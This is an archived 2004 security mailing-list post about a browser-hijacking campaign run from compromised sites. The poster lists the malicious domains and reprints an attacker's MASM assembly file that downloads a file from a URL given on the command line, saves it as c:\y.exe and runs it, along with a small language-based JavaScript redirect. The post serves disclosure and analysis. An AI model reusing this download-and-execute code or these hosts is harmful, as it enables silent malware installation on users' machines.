lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <C7D0C474-AEBE-11D8-9CFC-0003937A28B4@dalhuijsen.com>
From: thijs at dalhuijsen.com (Matthijs Dalhuijsen)
Subject: browser hijack by apache sites

On 24-mei-04, at 14:46, Feher Tamas wrote:

>> http://www.b00gle.com/fa/?d=get

good thing the internet has a memory :)
http://216.239.59.104/search?q=cache:yYCmQqdLUvMJ:www.b00gle.com/fa/ 
%3Fd%3Dget+&hl=en
http://www.google.com/search?q=cache:iyMDunIkp08J:www.b00gle.com/fa/ 
tool.html+&amp;hl=en


http://www.pizdato.biz/acc1/ to http://www.pizdato.biz/acc9/ show the  
same files, as if copied in a for loop

i especially liked 2 files in the dir; counter.htm containing the  
extremely funny
<script language="JavaScript">
<!--
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "home.html";
//-->
</script>






but then i saw this:  
http://www.pizdato.biz/acc10/2DimensionOfExploits.asm
Hehehe, Open Source is getting big!, didnt see no GPL licence so i hope  
im not Violating someones copyright by posting this here,....

.386

.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc

includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

.data

	szLibrary db "urlmon.dll",0
	szFunction db "URLDownloadToFileA",0

	szFileName db "c:\y.exe", 0

.code
start:

	invoke GetCommandLineA

	add	ax,	0Ah
	lea	ecx,	[eax]
	push	ecx

	invoke LoadLibrary, addr szLibrary
	invoke GetProcAddress, eax, addr szFunction

	pop	ecx
	push	0
	push	0
	lea 	ebx,	[szFileName]
	push	ebx
	push	ecx
	push	0
	call	eax

	invoke WinExec, addr szFileName, 1
	invoke ExitProcess, NULL

end start



Yet i do feel a bit suspicious about this set of files;,... bit TOO  
educating i think ;)

cheers!

thijs
--

If i had 6 hours to chop down a tree, I'd spend the first four  
sharpening the axe.
                                        -- Abraham Lincoln

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ